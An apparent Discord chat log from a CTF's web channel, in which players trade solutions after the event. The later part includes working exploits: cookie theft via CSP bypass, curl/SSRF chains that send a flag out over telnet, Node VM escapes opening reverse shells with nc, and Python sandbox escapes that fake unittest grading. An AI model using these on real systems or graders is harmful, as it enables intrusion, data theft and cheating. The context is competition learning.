#web
always
it's actually just 1 challenge renamed 14 different things

fixing scorescope
i found the xss
where is the flag?
I got unintended solution for web/gift i think
scorescope up?
:hmm:
https://gift.mc.ax/ is there meant to be service unavailable at this endpoint
should be back now
gift is going down for a little bit
oh thats why i was getting 50x's
@tame hawk when it's coming back?
🕸️
soon™️
NICE!
it'll be back soon
ok maybe i will wait for 30 minutes until the ctf will start
i think it's my bad...
yep yep
mine is perma grading 🙃 even with default template
perma grading
did scorescope die ?
yes
@vital umbra @loud geode
fixing
some issues with web/gift! will come back up shortly
ew
it's back up btw
yay
scorescope up?
me as well. not just that but i didn't know wth IND_CCA2 was lol
this too
web chall is full of various sorts of xss and stuff :smh
not helping, stuck at recursive-csp T.T
create a ticket
is codebox down or is it just me ?
seems to work for me
codebox 3 solves in 12 mins 

same deal, created a ticket
I thought I was good at python jailbreak, but ooof
same can't bypass the nonce csp
same lol
wait, you're meant to bypass it??
hello, how do you bypass recursive-csp policies?
feel free to ask after the ctf is over
give me a hint
do we have all the files for unfinished? 😛
yup
Lol no
Is the Bad Gateway in unfinished part of the challenge?
i am unable to access my instance
It seems scorescope's autograder is not working properly, is the server ok?
Response got too slow for requests to /api/stream/*
Sorry, infra team is asleep atm, we'll look into those asap
if you're getting bad gateway errors for unfinished wait a minute for the instance to load
if it still doesn't work after that open a ticket
maybe try another browser
Can i DM for codebox
I think i found unintended method
Open a ticket
Waited few hours and it works fine now 😄
CodeBlox was a cute challenge, had fun
thanks 
Think i'm not so skilled for these challenges, cant wait to see the writeups
You and me both! I'm struggling here, very excited to learn what I'm missing
im surprised there are only 2 solves for jnotes
Recursive csp got me tripping
i think scorescope had a hiccup
someone check infra?
(or was someone's solve too effective)
scorescope keeps crashing for me too
@loud geode
seems to be working fine atm for me too
^
Insanity is increasing every second with the gift challenge
Still on csp recursive
💀
u can do it popsmoke 👍
It can't be brute force but there's literally no other way
Yes same but my pc will be done in 100000 lightyears
buy a better pc
pay to win tbh
that's why solving it = good
well I spent a whole day on that challenge and didn't even realise that I can get the source code 😂, so I guessed everything, even the hashing algorithm and everything
but I had an idea that doesn't involve brute forcing yet when I saw the source code I realised it has a size limit in the payload
so my day is now ruined
lol
I didn't expect that mc.ax is on public suffix list 😢
Or use a faster language
Sometimes python is not the way to go
yeah I speak anaconda

huh scorescope shouldnt be sleeping
it learned to take breaks
these challenges are so frustrating. For the sake of my mental health i'll simply watch the writeups, because this is crazy.

I've been stuck on jnotes for 6+ hours and I keep thinking I'm close then run into a problem. I'm just gonna wait for a write up, it's too hard.
lemon = waiting for write-up



time to check another challenge
web is hard
this is the first time I struggle that much with web challenges... bet those write-ups gonna be juicy 😆

Hi i'm new to CTFs, where can we find the write-ups after the CTF ends?
We'll probably make a writeups channel, and people can upload writeups on ctftime
I am sure that when I'll read recursive-csp writeup I am going to slap myself
Hard but good. Gonna be fun checking writeups later and see how much i missed 😭
web is hard - many of them are about things I've never heard before
very good learning chance
Can't wait to read a writeup about codeblock. I'm certainly overthinking it 
I don't think you are? It feels like it uses techniques I just don't know about XD
Yeah I know the direction perhaps, but not sure how to do it exactly as it always lacks of an important detail for it to work
Haha, same thing, I wish I knew how to bypass that, and I find very exotic writeups on it, but nope, never works
RIGHT
So I don't have the payload
Ik the vuln tho
🤡
Oh wait I prob shouldn't say that
I have no clue, most of my knowledge is oriented around backend bugs
Wheeee sql injection go brrrr
it was unfortunate for me that all the challenges are about the front-end
No same but hey good learning
definitely can't always rely on one category ig
Just find a 0day and you'll be fine
There was a ctf recently, where you could submit a url, the bot would then visit. And it literally was a chrome rce. Lol
👀
I hate those kinds of challenges, I always keep focus on the code and then it turns out that the solution is a CVE 😂
Yeah xD The first thing I do for now on is to check versions lol
lesson learned

we really do think of everything
we're registrars for the .ax TLD for this reason actually
yeah in like 2 hours
try opening a ticket but no guarantees lol
crap
@vital umbra same for Gift? I'm already hairless thanks to it 
probably can't help much but you can try opening a ticket if you're experiencing a problem with something very specific
screenshotted+dmed to sleevi
ono
does sleevi even do PSL anymore
busted
seems like no
tragic
it python. use all the force
Do we get $50 bounty for solving unsolved challenges after the ctf
Hey admin, can you send me a gift
I'm not planning a bounty for impossible xss
We don't have it just saying lol
super guesser strong
false advertising :^)
Sad I'm so close to flag gift but, I'm getting out of time
Can't wait to see the writeup !
Btw, are there going to be organizers writeups for webs?
I would love to read them
2 minutes left woooooooooooooooo
can someone just send like an entire writeup for every web
explained in idiot terms
🙏
🥺
we'll release some writeups probably
if you want a hint for impossible-xss while we're still putting together writeups: || xml ||
ban
oop
ban
Oh no they might solve it in 30 seconds
aint no way
now
LMAO
writeup pls
i got it in 1 second
how did u leak this f** private key on gift ???
writeups plz
Yes pllllssss 😭
codebox please
writeup for codebox pls
Explain gift please!
csp injection and leak with script-sample and report-uri
and scorescope
was web/unfinished TLS poisoning
how do u do scorescope lmao
what-
wtf
script-sample/
you can require trusted types as part of CSP with require-trusted-types-for, you need ?code=&code=[payload] to trick the client into not setting the textarea but setting the h1 while the server still modifies CSP and report-uri to leak
Code box is csp injection with bypass on query parse
what was the payload for scorescope?
https://codebox.mc.ax/?code=&code=%3Cimg+src%3D%22*%3B+require-trusted-types-for+%27script%27+%3B+report-uri+https%3A%2F%2Fztwajhrp7wf40bww2y4i23ctvk1cp2dr.[BURPSUITE]%2F%22+%3E
this was the payload to flag
yes
for scorescope I just wrote the algorithms as asked
You had to modify the global tests list
you can overwrite the test cases using sys.modules
Explain gift!
no you could just use telnet protocol and -T to ssrf to mongodb
damn bro. you have a quantum computer or something
why was scorescope in web
how do you use telnet
i see that's cool
what did u ssrf to mongo in unfinished?
blind
I think that was just an honest mistake and he was too lazy to move
creative solution for scorescope lol
iT hAs a wEb iNtErFaCe
i used telnet protocol for unfinished to talk to mongodb
telnet protocol? but doesn't it check
I used ftp
it's a pyjail though?
gotcha lol
but what to send to it
mongodb wire protocol packet
which does what?
I was gonna TLS poison
But why code twice?
unfinished?
writeup for gift?
TLS poisoning was one way to solve geminiblog
can someone explain recursive-csp please
unintended for unfinished is write js code in node_modules that runs
because ftp data connections are not logged
because i forgot to make that folder unwritable
oh bruh
I could have done that
xd
for scorescope I just returned an object that always __eq__ to true
scorescope solution:
```py
def findclass(s):
    # walk object's subclasses and keep the ones whose repr contains s
    return list(filter(lambda x: s in str(x), [b for b in {}.__class__.__base__.__subclasses__()]))

def fake_call_test(*a):
    print("FAKE CALL", *a)
    return 1

hax = findclass(".TestCase")[0]
setattr(hax, "_callTestMethod", fake_call_test)
```
for preimage
```py
# h and e are the helper classes from the full version of this solve posted further down
def preimage(hash):
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]
    # solves test_preimage_b which actually uses hashlib.sha256 by monkeypatching it
    imp("hashlib").sha256 = lambda x: h(imp("inspect").currentframe().f_back.f_code.co_consts[-1])
    # solves test_preimage_a which is just comparison to the constant string "dicectf"
    return e()
```
to get the client to connect to memcached?
Misclick lol
much easier: import __main__ then you can modify __main__.tests
I didn't get the last part of the chall but, gift was about client side race condition on /api/info + Dunggling Markup on /create/Infinity to get the public key (I have no idea how to get the private one to solve the challenge 😦
<?php
$bytes = random_bytes(5);
$random = bin2hex($bytes);
?>
<form id="x" method="POST" action="https://gift.mc.ax/api/login" enctype="text/plain">
<input name='{"name":"<?= $random ?><meta http-equiv=\"refresh\" content=\"0;<?= $_GET["remote"] ?>?content=","random":"' value='aa"}'>
</form>
<script>
step = new URLSearchParams(document.location.search).get("step");
if (step == "1") {
window.open("?step=2&remote=<?= $_GET["remote"] ?>");
document.location = "https://gift.mc.ax/create/Infinity";
}
if (step == "2") {
x.submit();
}
</script>
to send arbitrary commands to memcached, yea
ow lol
other way was sni injection
huh, interesting
```py
# e is the always-equal helper class from the preimage solve
def magic():
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]
    parent_frame = imp("inspect").currentframe().f_back
    parent_frame2 = imp("inspect").currentframe().f_back.f_back
    consts1 = parent_frame.f_locals
    consts2 = parent_frame2.f_locals
    # Patch test_hidden
    # The nesting level is not 9 in test_magic_c, so we cannot patch there
    if ".0" not in consts1:
        next(iter(next(iter(list(imp("inspect").currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals['self'])[7])))).__class__.test_hidden = lambda self: True
    if ".0" in consts1:
        # First time, should return correct values
        if parent_frame2.f_lineno == 18:
            idx = 64 - consts1[".0"].__length_hint__()
            return consts2["targets"][idx - 1]
        # Second time, should return incorrect values
        return 1
    return e()
```
limit was undefined
as default
okay so is unfinished solvable using TLS poisoning though
idk
Limit was 0 by default ??
for scorescope I just used a bunch of these:
sys.modules['test_6_preimage'].TestPreimage.test_preimage_b = lambda *args, **kwargs: True
What ???
i love javascript
och yet another CSP well documented feature
🫠
js moment
I have the source code where data.limit=0 ???
but there are no semicolons there
yep and there is no ; after that
so javascript interprets it differently
???? it was 0 not undefine
anyone jnote ?
nice
it's undefined because there is no 0[logger]
0[console.log, logger] is undefined
No but the two code params?
Yeye i see it
I legit blocked the API call with base href thanks to the CSP that didn't worked
I didn't do it on purpose, there's one too many
use the xss to set document.cookie='note="; Path=//', then access // and the flag will be in the note
bug in jetty's cookie parsing lets you smuggle cookies
I only solved scorescope and codebox
My payload solver for recursive csp:
```py
from zlib import crc32

script = """<script nonce="ffffffff">document.location="http://IP:PORT/"+document.cookie;</script>"""
for seeds in range(1000):
    h = str(seeds)
    payload = script + h
    c = crc32(payload.encode())
    # append the bitwise NOT of the crc so the crc of the whole blob becomes ffffffff
    cb = (0xffffffff ^ c).to_bytes(4, "little")
    # only keep candidates whose 4 trailing bytes are printable alphanumerics
    if all(b < 128 and chr(b).isalnum() for b in cb):
        blob = payload.encode() + cb
        print(len(blob), repr(blob))
        print(hex(crc32(blob)))
```
hah imagine knowing how CRC32 works
I just use PHP brute-force by appending "a" which kills my computer
tbh started reading that java crap but didn't make it
was the parameter injection (to openssl) intended for geminiblog? I didn't manage to get openssl to emit a valid gemini header, but afaict that's all I needed to get the flag.
I was 99% sure that it is fucked cookie parsing
Thank you sir. Can you explain it. I read so many documents about crc32 my brain broke
this is just forcing the CRC32 to specific value
yeh but why does that work
is there official for unfinished?
another recursive csp solve, but it constructs the matrix directly
Yet another solution to scorescope
```py
import sys

class FakeList(sys.modules["collections"].abc.MutableSequence):
    # looks like an empty list when read, but forwards inserts to the real successes list
    def __init__(self, reallist):
        self.list = list()
        self.reallist = reallist
    def __len__(self):
        return len(self.list)
    def __getitem__(self, i):
        return self.list[i]
    def __delitem__(self, i):
        del self.list[i]
    def __setitem__(self, i, v):
        self.list[i] = v
    def insert(self, i, v):
        self.reallist.insert(i, v)
    def __str__(self):
        return str(self.list)

def add(a, b):
    sys.modules["util"].hide.clear()
    results = sys.modules["inspect"].currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals["result"]
    results.errors = FakeList(results.successes)
    results.failures = results.errors
    results.missing = results.errors
```
the others functions are left untouched
I also spam f_back lol
```py
next(iter(next(iter(list(imp("inspect").currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals['self'])[7])))).__class__.test_hidden
```
in test_magic_a and test_magic_b (but not c since the list comprehensions mess up the layers)
math overflow
```py
def magic():
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]
    parent_frame2 = imp("inspect").currentframe().f_back.f_back
    consts1 = imp("inspect").currentframe().f_back.f_locals
    consts2 = parent_frame2.f_locals
    if ".0" in consts1:
        # First time, should return correct values
        if parent_frame2.f_lineno == 18:
            idx = 64 - consts1[".0"].__length_hint__()
            return consts2["targets"][idx - 1]
        # Second time, should return incorrect values
        return 1
```
use line number to solve test_magic_c with actual correct answer
impossible xss sol?
when you append the NOT of the CRC to the payload, the CRC of the concatenation is always ffffffff
Does anyone have a good resource or something like that for codebox ?
math is weird
@knotty tinsel 😄
writeup for unfinished please, how did you login?
you don't have to, it's blind SSRF/curl command injection
And how did you do that?
just make request to /api/ping, it doesn't check properly even though it gives you redirect message (so it's blind)
is this zero day?
|| XXE ||
My solution to magic a b and c (that I found before the more general solution)
I just checked if the variable correct was declared
```py
import sys

def magic():
    if ("targets" in sys.modules["inspect"].currentframe().f_back.f_back.f_locals):
        targets = sys.modules["inspect"].currentframe().f_back.f_back.f_locals["targets"]
        i = sys.modules["inspect"].currentframe().f_back.f_locals["_"]
        x = targets[i]
        # the "correct" variable only exists in the frame that expects a wrong answer
        if ("correct" in sys.modules["inspect"].currentframe().f_back.f_back.f_locals):
            x = 1
        return x
    random = test = sys.modules["inspect"].currentframe().f_back.f_locals["self"].rng
    random.seed(585)
    x = random.randint(0, 255)
    random.seed(585)
    return x
```
login check is flawed, there's no return after redirect so it still runs
oh lol
you write to config -o/-K ?
the middleware doesn't return and still calls next() so it's not really blocking
yeah
jetty zero day?
no in jetty
but how do you address mongodb?
I have no idea :)
^ telnet
lolol ofc
unfinished exploit:
```py
import requests
import time

url = 'https://unfinished-90476bd8497c68a4.mc.ax'

# raw MongoDB OP_MSG packet: find on collection "flag" in db "secret", limit 1
with open('raw_packet.txt', 'wb') as fout:
    fout.write(b'\x92\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xdd\x07\x00\x00\x00\x00\x00\x00\x00\x7d\x00\x00\x00\x02\x66\x69\x6e\x64\x00\x05\x00\x00\x00\x66\x6c\x61\x67\x00\x03\x66\x69\x6c\x74\x65\x72\x00\x05\x00\x00\x00\x00\x10\x6c\x69\x6d\x69\x74\x00\x01\x00\x00\x00\x08\x73\x69\x6e\x67\x6c\x65\x42\x61\x74\x63\x68\x00\x01\x10\x62\x61\x74\x63\x68\x53\x69\x7a\x65\x00\x01\x00\x00\x00\x03\x6c\x73\x69\x64\x00\x1e\x00\x00\x00\x05\x69\x64\x00\x10\x00\x00\x00\x04\xce\x2d\x77\x58\x58\xfd\x41\xc2\x98\xf9\x10\xbf\x99\x02\xfe\x2d\x00\x02\x24\x64\x62\x00\x07\x00\x00\x00\x73\x65\x63\x72\x65\x74\x00\x00')

print('upload packet contents')
# curl -o GET: the downloaded packet lands in a file called GET on the target
res = requests.post('%s/api/ping' % url, data = {
    'url': 'http://[...]/raw_packet.txt',
    'opt': '-o',
    'data': 'GET',
})
assert res.status_code == 200
time.sleep(5)

print('upload curl config')
with open('curl.config', 'wb') as fout:
    fout.write(("""
next
url="telnet://mongodb:27017"
upload-file="GET"
output="flag.txt"
no-buffer
""").strip().encode())
res = requests.post('%s/api/ping' % url, data = {
    'url': 'http://[...]/curl.config',
    'opt': '-o',
    'data': 'POST',
})
assert res.status_code == 200
time.sleep(5)

print('download flag')
# curl -K POST: read the uploaded config file and talk to mongodb over telnet://
try:
    res = requests.post('%s/api/ping' % url, data = {
        'url': 'http://google.com/',
        'opt': '-K',
        'data': 'POST',
    })
    assert res.status_code == 200
except:
    pass
time.sleep(10)

print('upload exfil config')
with open('curl.config', 'wb') as fout:
    fout.write(("""
next
url="telnet://[...]:1337"
upload-file="flag.txt"
""").strip().encode())
res = requests.post('%s/api/ping' % url, data = {
    'url': 'http://[...]/curl.config',
    'opt': '-o',
    'data': 'POST',
})
assert res.status_code == 200
time.sleep(5)

print('exfil')
try:
    res = requests.post('%s/api/ping' % url, data = {
        'url': 'http://google.com/',
        'opt': '-K',
        'data': 'POST',
    })
    assert res.status_code == 200
except:
    pass
```
u serious?
the telnet waits for stdin...?
hes serious
it can't be
oh I see, you need a file called POST or GET to smuggle anything into the FS
wat
wo
what is doing that
dude there's a fucking COMMENT in between the lines and js still thinks it's the same statement
well yeah comment can be not on a line by itself
or just files displayed as xml?
I knew js was weird but that's crazy
dafuq
anyway, amazing web challs
what if you had something like this
```js
$("html") // get root node using jQuery
.attr("class", "dark-mode");
```
something similar to "friends" in corctf2022, which is by the same author
this web was really fun. gift I had no idea how to, I think it was dangling markup on /api/login CSRF (SameSite=None)
how do u leak private on gift? @vital umbra
dangling markup for public
that's the fun part, you don't!
jwtjail? :D
yeah, makes sense
no it wasn't
pw?
writeup
we tested
my jwtjail solve:
```js
fetch("/api/verify", {
  method: "POST",
  headers: {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  body: `token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.LLPW3b1BzsGRHh1AiHDi6W6RKK-k7INCN_gkvzJUlfo"&secretOrPrivateKey={
    constructor: {
      name: {
        [Symbol.toPrimitive]: new Proxy(_=>_, {
          apply(a,b,c) {
            // c is the argsList array, created outside the vm, so its constructor chain reaches the host realm
            c.constructor.constructor("return this")().process.binding("spawn_sync").spawn({"args":["nc","IP","12345","-e","/bin/sh"],"file":"nc","stdio":[{"type":"pipe","readable":true,"writable":false}]})
          }
        })
      }
    }
  }`
})
```
jwtjail
```js
(function(){
  let a = {};
  const customInspectSymbol = Symbol.for('nodejs.util.inspect.custom');
  let b = {
    // util.inspect calls this with (depth, options, inspect); the third argument comes from the host realm
    [customInspectSymbol](depth, options, j) {
      let process = j.constructor.constructor('return process')();
      // stolen from https://jwlss.pw/mathjs/
      let spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};
      let spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};
      let f = spawnSync('sh', ['-c', 'ls | nc seraphin.xyz 25565']).stdout.toString();
      throw f;
      return "inspect";
    }
  };
  a = b;
  a.constructor = null;
  return a;
})()
```
TLDR: proxy apply trap 3rd arg is argsList which is array that comes from outside vm, which you can use to escape
then process.binding -> RCE
I have no idea how to tell what is from outside VM in proxy traps, just brute force using loop in arguments?
other solve was that mess above
it is undefined xD console.log it
https://blog.ankursundara.com/dicectf23-writeups/
Writeups for my challenges (jnotes impossible-xss and geminiblog)
impossible-xss is really good
^
It's mostly just weird browser trivia
scorescope was probably my favourite pyjail
didn't feel too restrictive
ctypes was blocked? I know syscalls were blocked, auditing events or seccomp?
maybe it was auditing with checking "os"
seccomp was imported from util
what?
oh wait yeah i remember seeing seccomp in modules
how do you know
i'm no longer able to read code
lol
JS automatic semicolon insertion
everything about JS does that to you sometimes
I love Kali
why do I get clowned on in other programming servers when I say that
why?
no ; so the line below the comment is in the same statement
I would have never seen that lol
util = __import__("util")
raise RuntimeError(dir(util))
RuntimeError: ['SilentResult', 'SubmissionImporter', 'TestCase', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'hidden', 'hide', 'importlib', 'seccomp', 'sys', 'traceback', 'unittest']
i thought new line was new statement in js
did you overwrite?
like you don't really need to put ;
no, it just kinda ends statements where it feels is right
huh it didn't for me?
lmao was that intentional?
i guess
I guess so. Biggest troll ever
we couldn't know it without console.log tbh
has someone made a static analyzer for that
apparently the author did that in another ctf so if you'd seen it before you'd probably have spotted it
weird it always does that to me
now i'll be aware
here.
the author made cookie-recipies
🤪
wow. mdn mentions this lol. i thought i know script-src 
bug on the line gift.limit = 0
i wonder how long it has been there
yeah, it's not too unrealistic. I can see a dev forgetting the ; and spending hours trying to figure out what's wrong
just js being js
It's what gave me the idea for the challenge
lmao troll
👍 .
I had figured out the dangling markup and was trying to get the private token somehow
i had this in my file the whole time but never used it, maybe related to this
```py
import importlib
try:
    import os
    importlib.reload(os)
except:
    pass
```
hmm maybe
I had to get __import__ from somewhere else
```py
builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
imp = builtins["__import__"]
```
ABCMeta.register is very rare because it is a normal function, not even a class method
lolol
so it is very useful for getting stuff like __self__, __code__ or whatever
@hollow geyser on our team solved it via
main = vars(__import__("__main__"))['sys'].modules['__main__']
main.tests = ['test_favorite' for _ in range(22)]
and just return 12? lol
yeah
I actually implement each one individually
lmaoo
i thought this chal was a web chal
and was trying to do seccomp bypass stuff
kinda pissed
```py
# A class whose instances are always equal to any other object when checked using the `==` operator, and returns itself when arithmetic is done on it
class e:
    def __eq__(self, other): return True
    def __gt__(self, other): return True
    def __mul__(self, other): return self

# A fake hashlib hash object that returns whatever string value is passed to it from a method called `hexdigest`
class h:
    def __init__(self, fake_digest): self.fake_digest = fake_digest
    def hexdigest(self): return self.fake_digest

def preimage(hash):
    '''
    Given a sha256 hash, find a preimage (bytes).

    Parameters:
        hash (str): The sha256 hash of a string in hex.

    Returns:
        bytes: A preimage of the hash.
    '''
    ######## YOUR CODE ########
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]
    # solves test_preimage_b which actually uses hashlib.sha256 by monkeypatching it
    imp("hashlib").sha256 = lambda x: h(imp("inspect").currentframe().f_back.f_code.co_consts[-1])
    # solves test_preimage_a which is just comparison to the constant string "dicectf"
    return e()
    ###########################
```
😭
😭
impossible web challenge
my solution was using sys._getframe to look up the stack
inspect.stack is blocked somehow? or
it causes failed to grade as well
maybe it's the auditing event for f_code... except you can actually access f_code
i thought we needed unrestricted rce since it was web category so i spent time trying to leak seccomp filter by dumping memory
idk how inspect.stack is blocked
i think this is misc or pwn (if you have a VERY broad definition of pwn)
anyone done impossible-xss?
idk exactly which but one of them makes it open up the file contents
which gets seccomped
no
i had local exploit but didnt work on remote
getsource?
LOL
yea I tried using inspect to get the source code and the file access killed it
yeah inspect makes some blocked syscalls 😭
I used dis.dis and inspect frame f_code
same
also if u just looked at the locals
inspect just calls sys
😭
the variable names sorta seemed reasonably descriptive
locals were useful for test_magic_c and getting the TestSuite
I even tried to use the LOAD_CONST bug on scorescope but still failed for some reason
i just printed out sys.modules slowly and overwrite modules
slowly? you can just raise any exception manually and get full output
you don't need to use the assert
😠
not web
🤪
? rude
thanks u
okay
so
i have to the conclusion that
the nesting level to the class with self with full testsuite in test_magic_c
is
wait for it!
🥁
it is 10
okay thanks for coming to my TED Talk
ok.
wow i can do this for a living
hidden test case is always the tricky one
lmao starlight
que?
Will the source be released for the challenge
Really want to see how the seccomp was implemented xd
Video write up for recursive-csp (4:20 mins) https://youtu.be/7077pH14-kE
it's just libseccomp
Ah i see
yet another scorescope exploit
```py
def win(self, *args, **kwargs):
    # move every error and failure over to successes, then report a clean run
    for err in self.errors:
        self.successes.append((err[0], None))
    for fail in self.failures:
        self.successes.append((fail[0], None))
    self.errors = []
    self.failures = []
    self.wasSuccessful = lambda *a, **kw: True
```
and then put this in any test case:
```py
sys.modules['util'].SilentResult.stopTestRun = win
```
How did you get the actual code out of the f_code? I had this elaborate setup trying to get the testResult out of the 16th stack frame back
huh I was running afoul of seccomp when I tried to print errors, or so I thought, oh well, messed something up stupid.
you can do
marshal.dumps(sys.modules['util'].SilentResult.stopTestRun.__code__)
then unmarshal the code object and dis.dis it
but also, the classes extend the python unittest classes, so you can just look up what the functions do
I had this whole ridiculous class setup
I would throw a Framer Exception and in the str it crawled the stack back and printed out all locals args code etc, I saw the test_8_hidden and saw its code I just couldn't figure out how to get the errors out of the SilentResult
I thought I was running against the filter, but prob just causing an error, oh well
we overwrote a lot of unittest.TestCase's assert functions to automatically pass all tests but the hidden one
then we passed the hidden test with this:
```py
noop = lambda *a, **kw: None

@classmethod
def setUpClass(cls):
    cls.test_hidden = noop
__import__('unittest').TestCase.setUpClass=setUpClass
```
Did the same first step, then overwrite the actual testcase because through all manner of introspection, I'd found the module and class containing the hidden test
wait, you need to dis.dis locally?
does dis.dis not work on server?
it might be trying to read the source code from a file
which seccomp doesn't like
lol that didn't even occur to me - you should definitely be able to dis on the server
where did you get the CDs?
yes, I did
I'm also curious to hear any opinions on challenges like impossible-xss, is it appropriate to run in a CTF, is the solution path too unclear for it to be fun, etc? Feel free to dm me
Anybody has writeup for gift? plz 🙏
wait, hold up
you mean, the python bytecode that I exported, I could have just done dis dis on locally?
🪦
i like the sort of "open-ended" style challenges a lot 🙂 removing the "oh this very specific functionality exists, so it must be relevant to the solution" aspect is quite nice. however i do think they generally take longer to solve so i tend to not look at stuff like impossible-xss until clearing the rest
What's the difference between doing this directly to __main__ as opposed to doing it through sys.modules? I did exactly this and I could replace up to 21 test cases with one that passes but when I replaced the 22nd the Eventsource stuff ended up returning nothing
Wait what
It does work
Fuck
I must have had something else in the script that messed it up
@vital umbra Don't think I won't forget this
I always try to play 4d chess when I did not try checkers 😦
"IT CANT BE THAT SIMPLE" --yes it is
very good
IMO it was fine, and it's not guessy because I knew the goal
It would've been fun if I spent time on it heh but there were so many other chals to do because I'm bad at web
It's the kind of web chal I like tbh
Where u have to dig into some obscure feature of existing (i.e. not canned lol) software
b01lers (Purdue's team)
The people working on it (including me) weren't too experienced so we didn't get too many of them
Oh nice!
Nice to see you're ctfing again 🙂
Bruh I feel so rusty
Haven't done CTF in too long
This is the wakeup call
😭
Solution path was clear enough, I was just not aware enough at 3-4am to notice that you could request external resources
ur god
What team are you playing with?
this was inadvertently a clue
OSUSEC haha
@prime folio Oh they still let you play after dropping? That's cool. Btw I don't know if this would actually happen but I'm currently the PR person for b01lers so if you're ever interested in giving a talk at a meeting or something we're always interested
impossible-xss is really good
I'm mad that I didn't solve it.
cope
seething
mald
definitely not intended as a hint, as I had not even seen the challenge at that point
😅
Apollo's gift
any wu for jnotes ?
linked in the author writeup hackmd https://hackmd.io/@defund-dicegang/rk3RO56hi
It was OK, but if you wanted to make it more straightforward u could allow ppl to upload files for example, this would point a little to researching different file formats and what can be done with them, but it's only imo
I am satisfied anyway xD
Looking at the soln 🤯
I learned that there's unittesting in Python from this CTF, but given the scenario in the challenge, is it a bad idea after all (i.e. what can people do to secure the thing)?
feed input to submissions through e.g. stdin so that it doesn't share the runtime of the grading code, sandboxing
For regular unit testing, you're generally not really concerned about "security" though, or not in that sense
Testing code is definitely a good thing to do
web/gift unintended solution that got fixed:
I changed the URL to https://gift.mc.ax/create/NaN , claimed it on another account, and on the account where my money was $NaN i could make multiple claimable $1e+308 gifts. I might've been able to already see the flag from the $NaN account but i didn't try that, I'm not sure if NaN counts as >= Infinity. They patched the challenge to disallow making $NaN value gifts.
very nice !
fixed?
context: #announcements message
am I being dumb? I'm in the docker container for 'unfinished' and I didn't think the node_modules folder was writable
nor can I write to /app/node_modules/express/test.txt
Yesn't. NaN would be the same as infinity sometimes in javascript. But it's javascript so we will never know
If Javascript follows the standard floating point rules NaN never compares true to anything including itself
Infinity is different, it is equal to itself (e.g. Number("1e500"))
Ooh I'll keep that in mind 👀
write to /home/user/node_modules/kerberos.js
you can find that path using strace, you see which random js files are looked for
ah, brilliant, ty
I was thinking /app/node_modules/express.js which would load before /app/node_modules/express/index.js
usually, when you test code, the code isn't trying to trick the unit tests into passing haha. in those cases, because we know our own code is not doing anything too funny, it's completely fine. however, a lot of automated homework grading software uses python unittesting to check the correctness of submissions, and that is not safe without manual review
I think homework graders rely on the fact that submissions are recorded for security
suspect instructors would not be very happy if they discovered you were tricking the grader
so the grader doesn't have to try very hard to prevent this kind of behavior
because humans exist
this is why u must get reverse shell on ur first assignment in the class
lol
cuz nobody will suspect ur hello world assignment
society is glad you dropped out of university
Some of the assignments here extracted if you passed by checking first printed line, so what you could do is just print that you got full points :v
interesting 🤔
it's true that if our own codes are doing funny things in unit tests we have bigger problems
and indeed I'm curious about the homework grading case: I'm not experienced in sandboxing before but from trixter's comment it seems that sandboxing + isolation with unit test modules should be a nice path to go
gradescope, in particular, is notably bad at this - student code just runs in a docker container that you can configure, but the default config does almost zero sandboxing, iirc, so you can exfiltrate any local files or modify your own score
https://www.seas.upenn.edu/~hanbangw/blog/hack-gs/ is a good writeup
So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.
3 years old, but still works as of mid last year
LMAO
How long will the web challenge environments maintain?
and maybe it can help u
:d
thanks
most likely 1-2 weeks
but challenge deploys have been released so should be the same even after servers go down
impossible-xss is a cool chall, just read the writeup
i tried to use a pdf during the competition, but pdfium seemed too locked down to get away with anything more than sending post requests
omg is that THE garvinator???
hi! im looking for an intermediate ctf team 🙂
im intermediate level at web. can participate almost every weekend
thanks, i think a few teams tried using pdf (which i didn't consider) but yeah it doesn't allow for much
Can someone tell me why, when i use /api/ping a second time, the node will break down? in web/unfinished
plz
through it, i can get shell
